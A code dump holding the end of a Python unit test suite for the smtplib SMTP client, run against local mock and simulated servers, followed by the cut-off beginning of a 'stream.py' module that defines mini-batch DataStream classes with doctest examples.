HOST = support.HOST
if sys.platform == 'darwin':
# select.poll returns a select.POLLHUP at the end of the tests
# on darwin, so just ignore it
def handle_expt(self):
pass
smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
serv.listen(5)
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
class GeneralTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
self.port = 25
def tearDown(self):
smtplib.socket = socket
# This method is no longer used but is retained for backward compatibility,
# so test to make sure it still works.
def testQuoteData(self):
teststr = "abc\n.jkl\rfoo\r\n..blue"
expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
self.assertEqual(expected, smtplib.quotedata(teststr))
def testBasic1(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port)
smtp.close()
def testSourceAddress(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port,
source_address=('127.0.0.1',19876))
self.assertEqual(smtp.source_address, ('127.0.0.1', 19876))
smtp.close()
def testBasic2(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects, include port in host name
smtp = smtplib.SMTP("%s:%s" % (HOST, self.port))
smtp.close()
def testLocalHostName(self):
mock_socket.reply_with(b"220 Hola mundo")
# check that supplied local_hostname is used
smtp = smtplib.SMTP(HOST, self.port, local_hostname="testhost")
self.assertEqual(smtp.local_hostname, "testhost")
smtp.close()
def testTimeoutDefault(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertTrue(mock_socket.getdefaulttimeout() is None)
mock_socket.setdefaulttimeout(30)
self.assertEqual(mock_socket.getdefaulttimeout(), 30)
try:
smtp = smtplib.SMTP(HOST, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def testTimeoutNone(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
smtp = smtplib.SMTP(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(smtp.sock.gettimeout() is None)
smtp.close()
def testTimeoutValue(self):
mock_socket.reply_with(b"220 Hola mundo")
smtp = smtplib.SMTP(HOST, self.port, timeout=30)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
@unittest.skipUnless(threading, 'Threading required for this test.')
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Capture SMTPChannel debug output
self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
smtpd.DEBUGSTREAM = io.StringIO()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1))
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
# restore sys.stdout
sys.stdout = self.old_stdout
# restore DEBUGSTREAM
smtpd.DEBUGSTREAM.close()
smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.quit()
def testSourceAddress(self):
# connect
port = support.find_unused_port()
try:
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3, source_address=('127.0.0.1', port))
self.assertEqual(smtp.source_address, ('127.0.0.1', port))
self.assertEqual(smtp.local_hostname, 'localhost')
smtp.quit()
except IOError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, b'OK')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, b'OK')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testELHO(self):
# EHLO isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, b'\nSIZE 33554432\nHELP')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testEXPNNotImplemented(self):
# EXPN isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (502, b'EXPN not implemented')
smtp.putcmd('EXPN')
self.assertEqual(smtp.getreply(), expected)
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (252, b'Cannot VRFY user, but will accept message ' + \
b'and attempt delivery')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.helo()
expected = (503, b'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.assertEqual(smtp.help(), b'Supported commands: EHLO HELO MAIL ' + \
b'RCPT DATA RSET NOOP QUIT VRFY')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
# Issue 12283
m = '.A test\n.mes.sage.'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('<>', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: <>$", re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
# make sure the Bcc header is still in the message.
self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
'<warped@silly.walks.com>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
# The Bcc header should not be transmitted.
del m['Bcc']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'warped@silly.walks.com'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
# Make sure nothing breaks if not all of the three 'to' headers exist
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
# Make sure addresses specified in call override those in message.
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m, from_addr='joe@example.com', to_addrs='foo@example.net')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: joe@example.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile(r"^recips: .*'foo@example.net'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
# Sender overrides To
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = 'the_rescuers@Rescue-Aid-Society.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: the_rescuers@Rescue-Aid-Society.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# The Resent-Bcc headers are deleted before serialization.
del m['Bcc']
del m['Resent-Bcc']
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: holy@grail.net$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('my_mom@great.cooker.com', 'Jeff', 'doe@losthope.net'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = 'holy@grail.net'
m['Resent-From'] = 'Martha <my_mom@great.cooker.com>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
class NonConnectingTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
def tearDown(self):
smtplib.socket = socket
def testNotConnected(self):
# Test various operations on an unconnected SMTP object that
# should raise exceptions (at present the attempt in SMTP.send
# to reference the nonexistent 'sock' attribute of the SMTP object
# causes an AttributeError)
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises socket.error
self.assertRaises(mock_socket.error, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(mock_socket.error, smtplib.SMTP,
"localhost:bogus")
# test response of client to a non-successful HELO message
@unittest.skipUnless(threading, 'Threading required for this test.')
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
mock_socket.reply_with(b"199 no hello for you!")
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.port = 25
def tearDown(self):
smtplib.socket = socket
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'Mr.A@somewhere.com':'John A',
'Ms.B@xn--fo-fka.com':'Sally B',
'Mrs.C@somewhereesle.com':'Ruth C',
}
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_auth_credentials = {
'login': 'TXIuQUBzb21ld2hlcmUuY29t',
'plain': 'AE1yLkFAc29tZXdoZXJlLmNvbQBzb21lcGFzc3dvcmQ=',
'cram-md5': ('TXIUQUBZB21LD2HLCMUUY29TIDG4OWQ0MJ'
'KWZGQ4ODNMNDA4NTGXMDRLZWMYZJDMODG1'),
}
sim_auth_login_password = 'C29TZXBHC3N3B3JK'
sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
'list-2':['Ms.B@xn--fo-fka.com',],
}
# Simulated SMTP channel & server
class SimSMTPChannel(smtpd.SMTPChannel):
quit_response = None
mail_response = None
rcpt_response = None
data_response = None
rcpt_count = 0
rset_count = 0
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
super(SimSMTPChannel, self).__init__(*args, **kw)
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
self.seen_greeting = arg
self.extended_smtp = True
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No access for you!')
def smtp_AUTH(self, arg):
if arg.strip().lower()=='cram-md5':
self.push('334 {}'.format(sim_cram_md5_challenge))
return
mech, auth = arg.split()
mech = mech.lower()
if mech not in sim_auth_credentials:
self.push('504 auth type unimplemented')
return
if mech == 'plain' and auth==sim_auth_credentials['plain']:
self.push('235 plain auth ok')
elif mech=='login' and auth==sim_auth_credentials['login']:
self.push('334 Password:')
else:
self.push('550 No access for you!')
def smtp_QUIT(self, arg):
if self.quit_response is None:
super(SimSMTPChannel, self).smtp_QUIT(arg)
else:
self.push(self.quit_response)
self.close_when_done()
def smtp_MAIL(self, arg):
if self.mail_response is None:
super().smtp_MAIL(arg)
else:
self.push(self.mail_response)
def smtp_RCPT(self, arg):
if self.rcpt_response is None:
super().smtp_RCPT(arg)
return
self.rcpt_count += 1
self.push(self.rcpt_response[self.rcpt_count-1])
def smtp_RSET(self, arg):
self.rset_count += 1
super().smtp_RSET(arg)
def smtp_DATA(self, arg):
if self.data_response is None:
super().smtp_DATA(arg)
else:
self.push(self.data_response)
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
channel_class = SimSMTPChannel
def __init__(self, *args, **kw):
self._extra_features = []
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr)
def process_message(self, peer, mailfrom, rcpttos, data):
pass
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1))
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for email, name in sim_users.items():
expected_known = (250, bytes('%s %s' %
(name, smtplib.quoteaddr(email)),
"ascii"))
self.assertEqual(smtp.vrfy(email), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, bytes('\n'.join(users), "ascii"))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, b'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
expected_auth_ok = (235, b'plain auth ok')
self.assertEqual(smtp.login(sim_auth[0], sim_auth[1]), expected_auth_ok)
smtp.close()
# SimSMTPChannel doesn't fully support LOGIN or CRAM-MD5 auth because they
# require a synchronous read to obtain the credentials...so instead smtpd
# sees the credential sent by smtplib's login method as an unknown command,
# which results in smtplib raising an auth error. Fortunately the error
# message contains the encoded credential, so we can partially check that it
# was generated correctly (partially, because the 'word' is uppercased in
# the error message).
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
try: smtp.login(sim_auth[0], sim_auth[1])
except smtplib.SMTPAuthenticationError as err:
self.assertIn(sim_auth_login_password, str(err))
smtp.close()
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
try: smtp.login(sim_auth[0], sim_auth[1])
except smtplib.SMTPAuthenticationError as err:
self.assertIn(sim_auth_credentials['cram-md5'], str(err))
smtp.close()
def test_with_statement(self):
with smtplib.SMTP(HOST, self.port) as smtp:
code, message = smtp.noop()
self.assertEqual(code, 250)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.close()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
def test_with_statement_QUIT_failure(self):
with self.assertRaises(smtplib.SMTPResponseException) as error:
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.noop()
self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
self.assertEqual(error.exception.smtp_code, 421)
self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
# Issue 5713: make sure close, not rset, is called if we get a 421 error
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('John@foo.org', ['Sally@foo.org'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
@support.reap_threads
def test_main(verbose=None):
support.run_unittest(GeneralTests, DebuggingServerTests,
NonConnectingTests,
BadHELOServerTests, SMTPSimTests)
if __name__ == '__main__':
test_main()
|
stream.py
|
import warnings
from logging import getLogger
from queue import Queue
from threading import Thread, Semaphore
from typing import *
import numpy as np
from ..typing_ import *
from ..utils import (minibatch_slices_iterator, AutoInitAndCloseable, NOT_SET,
GeneratorIterator, to_number_or_numpy)
__all__ = [
'DataStream', 'UserGeneratorDataStream',
'ArraysDataStream', 'IntSeqDataStream',
'GeneratorFactoryDataStream', 'GatherDataStream',
'MapperDataStream', 'ThreadingDataStream',
]
def map_to_tuple(fn: Callable[[Any], TObject], seq: Iterable[Any]):
return tuple(fn(s) for s in seq)
def to_data_shapes(data_shapes) -> Tuple[ArrayShape, ...]:
return map_to_tuple(lambda x: map_to_tuple(int, x), data_shapes)
def to_readonly_array(arr: Array) -> Array:
arr = np.asarray(arr)
arr.setflags(write=False)
return arr
def ensure_batch_is_tuple(batch: Union[Array, ArrayTupleOrList]
) -> ArrayTuple:
if not isinstance(batch, (tuple, list)):
batch = (batch,)
else:
batch = tuple(batch)
return batch
class DataStream(object):
"""
Class to construct mini-batch data iterators.
Constructing Data Streams
=========================
All :class:`DataStream` subclasses shipped by `ml_essentials` can be
constructed via factory methods of this base class.
To construct a data stream from numpy arrays, you may:
>>> x = np.arange(5, dtype=np.int32)
>>> y = x ** 2
>>> stream = DataStream.arrays([x, y], batch_size=3)
>>> for [a, b] in stream:
... print(a, b)
[0 1 2] [0 1 4]
[3 4] [ 9 16]
To construct a integer sequence data stream, you may:
>>> stream = DataStream.int_seq(start=1, stop=10, step=2, batch_size=3)
>>> for [a] in stream:
... print(a)
[1 3 5]
[7 9]
To gather multiple data streams into one, you may:
>>> stream_1 = DataStream.int_seq(5, batch_size=3)
>>> stream_2 = DataStream.int_seq(-5, step=-1, batch_size=3)
>>> for [a] in stream_1:
... print(a)
[0 1 2]
[3 4]
>>> for [b] in stream_2:
... print(b)
[ 0 -1 -2]
[-3 -4]
>>> stream = DataStream.gather([stream_1, stream_2])
>>> for [a, b] in stream:
... print(a, b)
[0 1 2] [ 0 -1 -2]
[3 4] [-3 -4]
To turn an arbitrary mini-batch generator factory function into a data
stream, you may:
>>> def data_generator():
... for i in range(2):
... yield np.arange(i * 3, (i + 1) * 3, dtype=np.int32)
>>> stream = DataStream.generator(data_generator)
>>> for [a] in stream:
... print(a)
[0 1 2]
[3 4 5]
or you may generate a tuple / list of arrays:
>>> def data_generator():
... for i in range(2):
... arr = np.arange(i * 3, (i + 1) * 3, dtype=np.int32)
... yield arr, arr ** 2 # or return [x + y, x * y]
>>> stream = DataStream.generator(data_generator)
>>> for [a, b] in stream:
... print(a, b)
[0 1 2] [0 1 4]
[3 4 5] [ 9 16 25]
Transforming Data Streams
=========================
A :class:`DataStream` instance can be transformed into another data stream.
To select a subset of the arrays within each mini-batch, or re-order the
arrays, you may:
>>> x = np.arange(0, 5, dtype=np.int32)
>>> y = np.arange(5, 10, dtype=np.int32)
>>> z = np.arange(10, 15, dtype=np.int32)
>>> # note we shall select [x, z, x]
>>> stream = DataStream.arrays([x, y, z], batch_size=3).select([0, 2, 0])
>>> for [a, b, c] in stream:
... print(a, b, c)
[0 1 2] [10 11 12] [0 1 2]
[3 4] [13 14] [3 4]
To transform the arrays within each mini-batch by a mapper function,
you may:
